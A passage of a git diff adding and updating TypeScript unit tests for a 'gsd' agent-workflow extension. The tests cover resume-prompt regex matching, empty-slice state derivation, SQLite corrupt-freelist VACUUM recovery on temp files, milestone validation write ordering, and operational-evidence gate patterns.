+    assert.ok(
+      fallbackSection.includes("buildTaskExecutionContextInjection") &&
+      fallbackSection.includes("state.activeMilestone.id") &&
+      fallbackSection.includes("state.activeSlice.id") &&
+      fallbackSection.includes("state.activeTask.id"),
+      "fallback must call buildTaskExecutionContextInjection with state-derived IDs",
+    );
+  });
+
+  test("only one return null at the end", () => {
+    const returnNulls = fnBody.match(/return null;/g);
+    assert.ok(
+      returnNulls && returnNulls.length === 1,
+      `expected exactly 1 'return null' (at end after fallback), got ${returnNulls?.length ?? 0}`,
+    );
+  });
+});
+
+// ── Behavioral tests: RESUME_INTENT_PATTERNS ────────────────────────
+
+describe("#3615 — behavioral: RESUME_INTENT_PATTERNS matches resume prompts", () => {
+  // Extract the regex from source so the test stays in sync
+  const patternMatch = systemContextSource.match(/const RESUME_INTENT_PATTERNS\s*=\s*\/(.+)\/;/);
+  assert.ok(patternMatch, "should find RESUME_INTENT_PATTERNS definition");
+  const pattern = new RegExp(patternMatch[1]);
+
+  // Helper: normalize prompt the same way the production code does
+  const normalize = (s: string) => s.trim().toLowerCase().replace(/[.!?,]+$/g, "");
+
+  const shouldMatch = [
+    "continue",
+    "Continue",
+    "CONTINUE",
+    "continue.",
+    "continue!",
+    "resume",
+    "ok",
+    "OK",
+    "Ok!",
+    "go",
+    "go ahead",
+    "Go ahead.",
+    "proceed",
+    "keep going",
+    "carry on",
+    "next",
+    "yes",
+    "yeah",
+    "yep",
+    "sure",
+    "do it",
+    "let's go",
+    "pick up where you left off",
+    "  continue  ",  // whitespace padded
+  ];
+
+  const shouldNotMatch = [
+    "help",
+    "status",
+    "/gsd auto",
+    "/gsd stats",
+    "what's the plan?",
+    "show me the logs",
+    "abort",
+    "stop",
+    "cancel",
+    "replan this slice",
+    "I think we should change the approach",
+    "can you explain what you just did?",
+    "run the tests",
+    "check the build",
+    "Execute the next task: T01",
+    "what files were changed",
+    "",
+  ];
+
+  for (const prompt of shouldMatch) {
+    test(`matches resume prompt: "${prompt}"`, () => {
+      assert.ok(
+        pattern.test(normalize(prompt)),
+        `expected RESUME_INTENT_PATTERNS to match "${prompt}" (normalized: "${normalize(prompt)}")`,
+      );
+    });
+  }
+
+  for (const prompt of shouldNotMatch) {
+    test(`rejects non-resume prompt: "${prompt}"`, () => {
+      assert.ok(
+        !pattern.test(normalize(prompt)),
+        `expected RESUME_INTENT_PATTERNS to NOT match "${prompt}" (normalized: "${normalize(prompt)}")`,
+      );
+    });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/update-command.test.ts b/src/resources/extensions/gsd/tests/update-command.test.ts
index 9245d87c0..849f261ef 100644
--- a/src/resources/extensions/gsd/tests/update-command.test.ts
+++ b/src/resources/extensions/gsd/tests/update-command.test.ts
@@ -65,3 +65,22 @@ test("/gsd update is listed in completions with correct description", () => {
     "completion description should mention updating",
   );
 });
+
+test("/gsd codebase appears in top-level completions", () => {
+  const pi = createMockPi();
+  registerGSDCommand(pi as any);
+
+  const gsd = pi.commands.get("gsd");
+  const completions = gsd.getArgumentCompletions("code");
+  const codebaseEntry = completions.find((c: any) => c.value === "codebase");
+  assert.ok(codebaseEntry, "codebase should appear in completions");
+  assert.match(codebaseEntry.description, /codebase map cache/i);
+});
+
+test("/gsd codebase appears in help description", () => {
+  const pi = createMockPi();
+  registerGSDCommand(pi as any);
+
+  const gsd = pi.commands.get("gsd");
+  assert.ok(gsd?.description?.includes("codebase"), "description should mention codebase");
+});
diff --git a/src/resources/extensions/gsd/tests/vacuous-truth-slices.test.ts b/src/resources/extensions/gsd/tests/vacuous-truth-slices.test.ts
new file mode 100644
index 000000000..d1736f79b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/vacuous-truth-slices.test.ts
@@ -0,0 +1,115 @@
+/**
+ * Regression test for #2667: deriveStateFromDb must NOT treat an empty
+ * slice array as "all slices done" due to JavaScript's vacuous-truth
+ * behavior of Array.prototype.every on an empty array.
+ *
+ * [].every(predicate) === true in JavaScript. Without a length > 0 guard,
+ * this causes a premature phase transition to validating-milestone when
+ * the DB returns 0 slices (e.g. after a worktree DB wipe).
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { deriveStateFromDb, invalidateStateCache } from "../state.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+} from "../gsd-db.ts";
+
+test("deriveStateFromDb does NOT skip to validating when slice array is empty (#2667)", async () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-vacuous-truth-"));
+  mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+
+  try {
+    // Set up a milestone with a roadmap that references slices,
+    // but the DB has NO slice rows (simulating a worktree DB wipe)
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
+      [
+        "# M001: Test Milestone",
+        "",
+        "## Slices",
+        "",
+        "### S01 — First Slice",
+        "Do something.",
+        "",
+        "### S02 — Second Slice",
+        "Do another thing.",
+      ].join("\n"),
+    );
+
+    openDatabase(":memory:");
+    // Milestone exists but NO slices inserted — simulates DB wipe
+    insertMilestone({ id: "M001", title: "Test Milestone", status: "active" });
+
+    invalidateStateCache();
+    const state = await deriveStateFromDb(base);
+
+    // The phase must NOT be "validating-milestone" or "completing-milestone"
+    // because no slices have been executed — the empty array should not
+    // trigger the "all slices done" code path.
+    assert.notEqual(
+      state.phase,
+      "validating-milestone",
+      "empty slice array must not trigger validating-milestone (vacuous truth)",
+    );
+    assert.notEqual(
+      state.phase,
+      "completing-milestone",
+      "empty slice array must not trigger completing-milestone (vacuous truth)",
+    );
+
+    closeDatabase();
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("deriveStateFromDb correctly reaches validating when all slices are done (#2667 guard)", async () => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-vacuous-truth-"));
+  mkdirSync(join(base, ".gsd", "milestones", "M001", "slices", "S01"), { recursive: true });
+
+  try {
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
+      [
+        "# M001: Test Milestone",
+        "",
+        "## Slices",
+        "",
+        "### S01 — First Slice",
+        "Do something.",
+      ].join("\n"),
+    );
+
+    // Write a slice summary so the filesystem recognizes it as complete
+    writeFileSync(
+      join(base, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md"),
+      "# S01 Summary\n\nDone.",
+    );
+
+    openDatabase(":memory:");
+    insertMilestone({ id: "M001", title: "Test Milestone", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First Slice", status: "complete", risk: "low", depends: [] });
+
+    invalidateStateCache();
+    const state = await deriveStateFromDb(base);
+
+    // With one slice that IS complete, phase should advance
+    assert.ok(
+      state.phase === "validating-milestone" || state.phase === "completing-milestone",
+      `expected validating or completing phase, got "${state.phase}"`,
+    );
+
+    closeDatabase();
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/vacuum-recovery.test.ts b/src/resources/extensions/gsd/tests/vacuum-recovery.test.ts
new file mode 100644
index 000000000..5cd0bb230
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/vacuum-recovery.test.ts
@@ -0,0 +1,154 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import * as fs from 'node:fs';
+import * as path from 'node:path';
+import * as os from 'node:os';
+import { createRequire } from 'node:module';
+import {
+  openDatabase,
+  closeDatabase,
+  isDbAvailable,
+  _getAdapter,
+} from '../gsd-db.ts';
+
+const _require = createRequire(import.meta.url);
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Helpers
+// ═══════════════════════════════════════════════════════════════════════════
+
+function tempDbPath(): string {
+  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'gsd-vacuum-test-'));
+  return path.join(dir, 'test.db');
+}
+
+function cleanup(dbPath: string): void {
+  closeDatabase();
+  try {
+    const dir = path.dirname(dbPath);
+    for (const f of fs.readdirSync(dir)) {
+      fs.unlinkSync(path.join(dir, f));
+    }
+    fs.rmdirSync(dir);
+  } catch { /* best effort */ }
+}
+
+/**
+ * Create a SQLite DB with a corrupt freelist that causes DDL to fail
+ * with "database disk image is malformed" but is recoverable via VACUUM.
+ *
+ * Strategy:
+ * 1. Create a DB with schema_version at v0 (so initSchema needs to run DDL)
+ * 2. Add padding rows to create many pages, then delete + drop to free them
+ * 3. Corrupt the freelist trunk pointer to point at a B-tree page
+ *
+ * This simulates the real-world scenario described in #2519: an interrupted
+ * WAL checkpoint leaves the freelist in an inconsistent state.
+ */
+function createCorruptFreelistDb(dbPath: string): void {
+  // Use node:sqlite directly to build the minimal corrupt DB
+  const sqlite = _require('node:sqlite');
+  const db = new sqlite.DatabaseSync(dbPath);
+  db.exec('PRAGMA journal_mode=WAL');
+  db.exec('CREATE TABLE schema_version (version INTEGER NOT NULL, applied_at TEXT NOT NULL)');
+  db.exec("INSERT INTO schema_version VALUES (0, '2024-01-01')");
+  // Pad with data to create many pages, then free them
+  db.exec('CREATE TABLE _padding (id INTEGER PRIMARY KEY, data TEXT)');
+  for (let i = 0; i < 30; i++) {
+    db.exec(`INSERT INTO _padding (data) VALUES ('${'x'.repeat(4000)}')`);
+  }
+  db.exec('DELETE FROM _padding');
+  db.exec('DROP TABLE _padding');
+  db.exec('PRAGMA wal_checkpoint(TRUNCATE)');
+  db.close();
+
+  // Remove WAL/SHM files to ensure clean file-only state
+  try { fs.unlinkSync(dbPath + '-wal'); } catch { /* may not exist */ }
+  try { fs.unlinkSync(dbPath + '-shm'); } catch { /* may not exist */ }
+
+  // Corrupt: point freelist trunk (offset 32-35) to page 2 (a B-tree page),
+  // and claim 10 free pages (offset 36-39)
+  const fd = fs.openSync(dbPath, 'r+');
+  try {
+    const buf = Buffer.alloc(8);
+    buf.writeUInt32BE(2, 0);   // trunk page = page 2 (actually a B-tree page)
+    buf.writeUInt32BE(10, 4);  // freelist count = 10
+    fs.writeSync(fd, buf, 0, 8, 32);
+  } finally {
+    fs.closeSync(fd);
+  }
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe('openDatabase VACUUM recovery on corrupt freelist', () => {
+
+  test('recovers a file-backed DB with corrupt freelist via VACUUM', () => {
+    const dbPath = tempDbPath();
+
+    // Create a DB with corrupt freelist (schema at v0 so initSchema runs DDL)
+    createCorruptFreelistDb(dbPath);
+
+    // Without the fix, this throws "database disk image is malformed".
+    // With the fix, openDatabase detects "malformed", runs VACUUM, retries.
+    const ok = openDatabase(dbPath);
+    assert.ok(ok, 'openDatabase should succeed after VACUUM recovery');
+    assert.ok(isDbAvailable(), 'DB should be available after recovery');
+
+    // Verify full schema was applied
+    const adapter = _getAdapter()!;
+    const row = adapter.prepare(
+      'SELECT MAX(version) as version FROM schema_version',
+    ).get();
+    assert.ok(
+      typeof row?.['version'] === 'number' && (row['version'] as number) > 0,
+      'schema_version should have a positive version after recovery',
+    );
+
+    cleanup(dbPath);
+  });
+
+  test('does not attempt VACUUM for non-malformed errors', () => {
+    // openDatabase with :memory: never hits the fileBacked VACUUM path,
+    // so non-malformed errors propagate directly. We verify by checking
+    // that a non-file error from an in-memory DB propagates unchanged.
+    // (In-memory DBs always succeed for initSchema, so this is a design
+    // check — the VACUUM path is only for fileBacked = true.)
+    const ok = openDatabase(':memory:');
+    assert.ok(ok, 'in-memory DB should open fine');
+    closeDatabase();
+  });
+
+  test('throws if VACUUM itself fails on unrecoverable corruption', () => {
+    const dbPath = tempDbPath();
+
+    // Create a file with valid SQLite header but thoroughly corrupt content
+    const page = Buffer.alloc(4096);
+    // SQLite magic: "SQLite format 3\0"
+    page.write('SQLite format 3\0', 0, 'utf8');
+    // Page size: 4096 (big-endian at offset 16)
+    page.writeUInt16BE(4096, 16);
+    page[18] = 1;  // write version
+    page[19] = 1;  // read version
+    page[20] = 0;  // reserved space
+    page[21] = 64; // max embedded payload fraction
+    page[22] = 32; // min embedded payload fraction
+    page[23] = 32; // leaf payload fraction
+    page.writeUInt32BE(1, 28);   // page_count = 1
+    page.writeUInt32BE(999, 32); // corrupt freelist trunk
+    page.writeUInt32BE(5, 36);   // freelist count = 5
+
+    fs.writeFileSync(dbPath, page);
+
+    // Should throw — VACUUM cannot save a thoroughly corrupt file
+    assert.throws(
+      () => openDatabase(dbPath),
+      /./,
+      'should throw for unrecoverable corruption',
+    );
+
+    cleanup(dbPath);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/validate-milestone-write-order.test.ts b/src/resources/extensions/gsd/tests/validate-milestone-write-order.test.ts
new file mode 100644
index 000000000..1f07791e0
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/validate-milestone-write-order.test.ts
@@ -0,0 +1,115 @@
+import { describe, it, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, existsSync, readFileSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { randomUUID } from "node:crypto";
+
+import { handleValidateMilestone } from "../tools/validate-milestone.js";
+import { openDatabase, closeDatabase, _getAdapter, insertMilestone, insertSlice } from "../gsd-db.js";
+import { clearPathCache } from "../paths.js";
+import { clearParseCache } from "../files.js";
+
+function makeTmpBase(): string {
+  const base = join(tmpdir(), `gsd-val-handler-${randomUUID()}`);
+  mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+  return base;
+}
+
+const VALID_PARAMS = {
+  milestoneId: "M001",
+  verdict: "pass" as const,
+  remediationRound: 0,
+  successCriteriaChecklist: "- [x] All pass",
+  sliceDeliveryAudit: "| S01 | delivered |",
+  crossSliceIntegration: "No issues",
+  requirementCoverage: "All covered",
+  verificationClasses: "- Contract: covered\n- Integration: covered\n- Operational: gap noted",
+  verdictRationale: "Everything checks out",
+};
+
+describe("handleValidateMilestone write ordering (#2725)", () => {
+  let base: string;
+
+  afterEach(() => {
+    clearPathCache();
+    clearParseCache();
+    try { closeDatabase(); } catch { /* */ }
+    if (base) {
+      try { rmSync(base, { recursive: true, force: true }); } catch { /* */ }
+    }
+  });
+
+  it("writes DB row and disk file on success", async () => {
+    base = makeTmpBase();
+    const dbPath = join(base, ".gsd", "gsd.db");
+    openDatabase(dbPath);
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+
+    const result = await handleValidateMilestone(VALID_PARAMS, base);
+    assert.ok(!("error" in result), `unexpected error: ${"error" in result ? result.error : ""}`);
+
+    // DB row exists
+    const adapter = _getAdapter()!;
+    const row = adapter.prepare(
+      `SELECT status, scope FROM assessments WHERE milestone_id = 'M001' AND scope = 'milestone-validation'`,
+    ).get() as { status: string; scope: string } | undefined;
+    assert.ok(row, "assessment row should exist in DB");
+    assert.equal(row!.status, "pass");
+
+    // Disk file exists
+    const filePath = join(base, ".gsd", "milestones", "M001", "M001-VALIDATION.md");
+    assert.ok(existsSync(filePath), "VALIDATION.md should exist on disk");
+    const validationMd = readFileSync(filePath, "utf-8");
+    assert.match(validationMd, /## Verification Class Compliance/);
+    assert.match(validationMd, /- Contract: covered/);
+    assert.match(validationMd, /## Verdict Rationale/);
+  });
+
+  it("omits verification class section when no verification classes are supplied", async () => {
+    base = makeTmpBase();
+    const dbPath = join(base, ".gsd", "gsd.db");
+    openDatabase(dbPath);
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+
+    const result = await handleValidateMilestone(
+      { ...VALID_PARAMS, verificationClasses: undefined },
+      base,
+    );
+    assert.ok(!("error" in result), `unexpected error: ${"error" in result ? result.error : ""}`);
+
+    const filePath = join(base, ".gsd", "milestones", "M001", "M001-VALIDATION.md");
+    const validationMd = readFileSync(filePath, "utf-8");
+    assert.doesNotMatch(validationMd, /## Verification Class Compliance/);
+  });
+
+  it("rolls back DB row when disk write fails", async () => {
+    base = makeTmpBase();
+    const dbPath = join(base, ".gsd", "gsd.db");
+    openDatabase(dbPath);
+    insertMilestone({ id: "M001" });
+    insertSlice({ id: "S01", milestoneId: "M001" });
+
+    // Force disk write failure by replacing the milestone directory with a
+    // regular file. saveFile() will fail because it cannot write inside a
+    // non-directory. This works cross-platform (chmod is ignored on Windows).
+    const milestoneDir = join(base, ".gsd", "milestones", "M001");
+    rmSync(milestoneDir, { recursive: true, force: true });
+    writeFileSync(milestoneDir, "not-a-directory");
+
+    const result = await handleValidateMilestone(VALID_PARAMS, base);
+
+    // Should return error
+    assert.ok("error" in result, "should return error when disk write fails");
+    assert.ok(result.error.includes("disk render failed"));
+
+    // DB row should have been rolled back (deleted)
+    const adapter = _getAdapter()!;
+    const row = adapter.prepare(
+      `SELECT * FROM assessments WHERE milestone_id = 'M001' AND scope = 'milestone-validation'`,
+    ).get();
+    assert.equal(row, undefined, "assessment row should be deleted after disk-write rollback");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/validate-milestone.test.ts b/src/resources/extensions/gsd/tests/validate-milestone.test.ts
index 9a1ed7f25..569abd796 100644
--- a/src/resources/extensions/gsd/tests/validate-milestone.test.ts
+++ b/src/resources/extensions/gsd/tests/validate-milestone.test.ts
@@ -6,8 +6,10 @@ import { tmpdir } from "node:os";
 import { randomUUID } from "node:crypto";
 
 import { deriveState, isValidationTerminal } from "../state.ts";
-import { resolveExpectedArtifactPath, verifyExpectedArtifact, diagnoseExpectedArtifact, buildLoopRemediationSteps } from "../auto-recovery.ts";
+import { resolveExpectedArtifactPath, diagnoseExpectedArtifact } from "../auto-artifact-paths.ts";
+import { verifyExpectedArtifact, buildLoopRemediationSteps } from "../auto-recovery.ts";
 import { resolveDispatch, type DispatchContext } from "../auto-dispatch.ts";
+import { buildValidateMilestonePrompt } from "../auto-prompts.ts";
 import type { GSDState } from "../types.ts";
 import { clearPathCache } from "../paths.ts";
 import { clearParseCache } from "../files.ts";
@@ -56,6 +58,12 @@ function writeSliceSummary(base: string, mid: string, sid: string, content: stri
   writeFileSync(join(dir, `${sid}-SUMMARY.md`), content);
 }
 
+function writeSliceAssessment(base: string, mid: string, sid: string, content: string): void {
+  const dir = join(base, ".gsd", "milestones", mid, "slices", sid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${sid}-ASSESSMENT.md`), content);
+}
+
 const ALL_DONE_ROADMAP = `# M001: Test Milestone
 
 ## Vision
@@ -109,6 +117,16 @@ test("isValidationTerminal returns true for verdict: passed (#1429)", () => {
   assert.equal(isValidationTerminal(content), true);
 });
 
+test("isValidationTerminal returns true for verdict: fail (#2769)", () => {
+  const content = "---\nverdict: fail\nremediation_round: 1\n---\n\n# Validation";
+  assert.equal(isValidationTerminal(content), true);
+});
+
+test("isValidationTerminal returns true for any arbitrary verdict string (#2769)", () => {
+  const content = "---\nverdict: custom-verdict\nremediation_round: 0\n---\n\n# Validation";
+  assert.equal(isValidationTerminal(content), true);
+});
+
 test("isValidationTerminal returns false for missing frontmatter", () => {
   const content = "# Validation\nNo frontmatter here.";
   assert.equal(isValidationTerminal(content), false);
@@ -152,16 +170,15 @@ test("deriveState returns completing-milestone when VALIDATION exists with termi
   }
 });
 
-test("deriveState treats needs-remediation as terminal — does not re-enter validating-milestone (#832)", async () => {
+test("deriveState treats needs-remediation as non-terminal — re-enters validating-milestone (#832)", async () => {
   const base = makeTmpBase();
   try {
     writeRoadmap(base, "M001", ALL_DONE_ROADMAP);
     writeValidation(base, "M001", "---\nverdict: needs-remediation\nremediation_round: 0\n---\n\n# Validation\nNeeds fixes.");
 
     const state = await deriveState(base);
-    // needs-remediation is now terminal — milestone needs a SUMMARY to be fully complete
-    // Without SUMMARY, it enters completing-milestone (not validating-milestone)
-    assert.notEqual(state.phase, "validating-milestone");
+    // needs-remediation routes back to validating-milestone for re-validation
+    assert.equal(state.phase, "validating-milestone");
     assert.equal(state.activeMilestone?.id, "M001");
   } finally {
     cleanup(base);
@@ -182,6 +199,25 @@ test("deriveState returns complete when both VALIDATION and SUMMARY exist", asyn
   }
 });
 
+test("buildValidateMilestonePrompt inlines ASSESSMENT evidence instead of UAT spec", async () => {
+  const base = makeTmpBase();
+  try {
+    writeRoadmap(base, "M001", ALL_DONE_ROADMAP);
+    const dir = join(base, ".gsd", "milestones", "M001");
+    writeFileSync(join(dir, "M001-CONTEXT.md"), CONTEXT_FILE);
+    writeSliceSummary(base, "M001", "S01", "# S01 Summary\nDelivered.");
+    writeFileSync(join(dir, "slices", "S01", "S01-UAT.md"), "# UAT Spec\nDo the thing.\n");
+    writeSliceAssessment(base, "M001", "S01", "---\nverdict: PASS\n---\n# Assessment\nEvidence captured.");
+
+    const prompt = await buildValidateMilestonePrompt("M001", "Test Milestone", base);
+    assert.match(prompt, /S01 Assessment/i, "prompt should inline assessment evidence");
+    assert.match(prompt, /verdict: PASS/i, "prompt should include the assessment verdict");
+    assert.doesNotMatch(prompt, /UAT Spec/i, "prompt should not inline the raw UAT spec as evidence");
+  } finally {
+    cleanup(base);
+  }
+});
+
 // ─── Dispatch rule ────────────────────────────────────────────────────────
 
 test("dispatch rule matches validating-milestone phase", async () => {
@@ -326,14 +362,14 @@ test("verifyExpectedArtifact rejects VALIDATION with missing verdict field", ()
   }
 });
 
-test("verifyExpectedArtifact rejects VALIDATION with unrecognized verdict", () => {
+test("verifyExpectedArtifact accepts VALIDATION with any extracted verdict", () => {
   const base = makeTmpBase();
   try {
     writeValidation(base, "M001", "---\nverdict: unknown-value\nremediation_round: 0\n---\n\n# Validation");
     clearPathCache();
     clearParseCache();
     const result = verifyExpectedArtifact("validate-milestone", "M001", base);
-    assert.equal(result, false, "VALIDATION with unrecognized verdict should fail verification");
+    assert.equal(result, true, "VALIDATION with any extracted verdict should pass verification");
   } finally {
     cleanup(base);
   }
@@ -375,7 +411,7 @@ test("buildLoopRemediationSteps returns steps for validate-milestone", () => {
     assert.ok(result);
     assert.ok(result!.includes("VALIDATION"));
     assert.ok(result!.includes("verdict: pass"));
-    assert.ok(result!.includes("gsd doctor"));
+    assert.ok(result!.includes("gsd recover"));
   } finally {
     cleanup(base);
   }
diff --git a/src/resources/extensions/gsd/tests/validation-gate-patterns.test.ts b/src/resources/extensions/gsd/tests/validation-gate-patterns.test.ts
new file mode 100644
index 000000000..722c4701f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/validation-gate-patterns.test.ts
@@ -0,0 +1,166 @@
+/**
+ * Unit tests for the milestone completion validation gate pattern matching.
+ *
+ * The gate in auto-dispatch accepts two evidence formats:
+ *   1. Structured template: content contains "Operational" AND ("MET" or "N/A")
+ *   2. Prose evidence: matches /[Oo]perational[\s:][^\n]*(?:pass|verified|...)/i
+ *
+ * These tests exercise the exact same expressions used in auto-dispatch.ts
+ * to ensure both formats are correctly recognized, and that content without
+ * operational evidence is properly rejected.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+
+// ─── Replicate the gate matching logic from auto-dispatch.ts ─────────────────
+
+/**
+ * Returns true when validation content contains acceptable operational
+ * verification evidence (structured or prose).  Mirrors the inline checks
+ * in the "execute → complete-milestone" dispatch rule.
+ */
+function hasOperationalEvidence(validationContent: string): boolean {
+  const structuredMatch =
+    validationContent.includes("Operational") &&
+    (validationContent.includes("MET") || validationContent.includes("N/A") || validationContent.includes("SATISFIED"));
+  const proseMatch =
+    /[Oo]perational[\s\S]{0,500}?(?:✅|pass|verified|confirmed|met|complete|true|yes|addressed|covered|satisfied|partially|n\/a|not[\s-]+applicable)/i.test(
+      validationContent,
+    );
+  return structuredMatch || proseMatch;
+}
+
+// ─── Structured format ───────────────────────────────────────────────────────
+
+test("structured: Operational + MET passes", () => {
+  const content = `| Criteria       | Status |
+| Operational    | MET    |
+| Functional     | MET    |`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test("structured: Operational + N/A passes", () => {
+  const content = `| Criteria       | Status |
+| Operational    | N/A    |
+| Functional     | MET    |`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test("structured: Operational present with MET on another row still passes (includes is content-wide)", () => {
+  // The structured check uses .includes() across the entire content,
+  // so "MET" on the Functional row satisfies the condition alongside
+  // "Operational" anywhere in the document.
+  const content = `| Criteria       | Status  |
+| Operational    | PENDING |
+| Functional     | MET     |`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test("structured: Operational alone without any MET or N/A anywhere fails", () => {
+  const content = `| Criteria       | Status  |
+| Operational    | PENDING |
+| Functional     | PENDING |`;
+  assert.ok(!hasOperationalEvidence(content));
+});
+
+// ─── Prose format ────────────────────────────────────────────────────────────
+
+test('prose: "Operational: verified" passes', () => {
+  const content = `## Validation Report
+Operational: verified — all endpoints responsive.
+Functional: tests pass.`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('prose: "Operational checks confirmed" passes', () => {
+  const content = `## Validation Report
+Operational checks confirmed by smoke test suite.`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('prose: "Operational — pass" passes', () => {
+  const content = `Operational — pass (all services healthy)`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('prose: "operational: addressed" passes (case-insensitive)', () => {
+  const content = `operational: addressed in CI pipeline run #42.`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('prose: "Operational: not applicable" passes', () => {
+  const content = `Operational: not applicable for this library-only change.`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('prose: "Operational: n/a" passes', () => {
+  const content = `Operational: n/a — no runtime components.`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('prose: "Operational: complete" passes', () => {
+  const content = `Operational: complete — all health checks green.`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+// ─── Issue #2862: checkmark emoji ────────────────────────────────────────────
+
+test('prose: "Operational: ✅" checkmark emoji passes (issue #2862)', () => {
+  const content = `- **Operational:** ✅ DECISIONS.md documents D009-D013`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+// ─── Issue #2866: multi-line, "satisfied", markdown bold ─────────────────────
+
+test('multi-line: verdict on next line after Operational heading passes (issue #2866)', () => {
+  const content = `### Operational Verification
+All endpoints responsive. Health checks pass.`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('prose: "PARTIALLY SATISFIED" passes (issue #2866)', () => {
+  const content = `Operational class: ⚠️ PARTIALLY SATISFIED`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('prose: "FULLY SATISFIED" passes (issue #2866)', () => {
+  const content = `**Operational**: FULLY SATISFIED — all monitoring in place.`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('structured: Operational + SATISFIED passes (issue #2866)', () => {
+  const content = `| Criteria       | Status    |
+| Operational    | SATISFIED |`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('table with markdown bold: **Operational** passes (issue #2866)', () => {
+  const content = `| **Operational** | ⚠️ Partially satisfied — monitoring gap noted |`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+test('multi-line: Operational label and "confirmed" separated by line break passes (issue #2866)', () => {
+  const content = `## Operational
+Smoke tests confirmed all services healthy after deploy.`;
+  assert.ok(hasOperationalEvidence(content));
+});
+
+// ─── Rejection cases ─────────────────────────────────────────────────────────
+
+test("no operational evidence: unrelated content fails", () => {
+  const content = `## Validation Report
+All functional tests pass.
+Code coverage at 92%.`;
+  assert.ok(!hasOperationalEvidence(content));
+});
+
+test("no operational evidence: word 'operational' buried without qualifying keyword fails", () => {
+  const content = `## Validation Report
+The operational aspects were not evaluated in this round.`;
+  assert.ok(!hasOperationalEvidence(content));
+});
+
+test("no operational evidence: empty content fails", () => {
+  assert.ok(!hasOperationalEvidence(""));
+});
diff --git a/src/resources/extensions/gsd/tests/validation.test.ts b/src/resources/extensions/gsd/tests/validation.test.ts
new file mode 100644
index 000000000..18a72b4f2
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/validation.test.ts
@@ -0,0 +1,72 @@
+// GSD — validation unit tests
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+
+import { isNonEmptyString, validateStringArray } from '../validation.ts';
+
+// ─── isNonEmptyString ────────────────────────────────────────────────────────
+
+test('isNonEmptyString: "hello" returns true', () => {
+  assert.equal(isNonEmptyString('hello'), true);
+});
+
+test('isNonEmptyString: " " (whitespace only) returns false', () => {
+  assert.equal(isNonEmptyString(' '), false);
+});
+
+test('isNonEmptyString: "" (empty string) returns false', () => {
+  assert.equal(isNonEmptyString(''), false);
+});
+
+test('isNonEmptyString: null returns false', () => {
+  assert.equal(isNonEmptyString(null), false);
+});
+
+test('isNonEmptyString: undefined returns false', () => {
+  assert.equal(isNonEmptyString(undefined), false);
+});
+
+test('isNonEmptyString: 42 (number) returns false', () => {
+  assert.equal(isNonEmptyString(42), false);
+});
+
+// ─── validateStringArray ─────────────────────────────────────────────────────
+
+test('validateStringArray: ["a", "b"] returns ["a", "b"]', () => {
+  assert.deepEqual(validateStringArray(['a', 'b'], 'items'), ['a', 'b']);
+});
+
+test('validateStringArray: [] (empty array) returns []', () => {
+  assert.deepEqual(validateStringArray([], 'items'), []);
+});
+
+test('validateStringArray: "not an array" throws with "must be an array"', () => {
+  assert.throws(
+    () => validateStringArray('not an array', 'items'),
+    (err: Error) => {
+      assert.ok(err.message.includes('must be an array'));
+      return true;
+    },
+  );
+});
+
+test('validateStringArray: ["a", 42] throws with "must contain only non-empty strings"', () => {
+  assert.throws(
+    () => validateStringArray(['a', 42], 'items'),
+    (err: Error) => {
+      assert.ok(err.message.includes('must contain only non-empty strings'));
+      return true;
+    },
+  );
+});
+
+test('validateStringArray: ["a", ""] throws with "must contain only non-empty strings"', () => {
+  assert.throws(
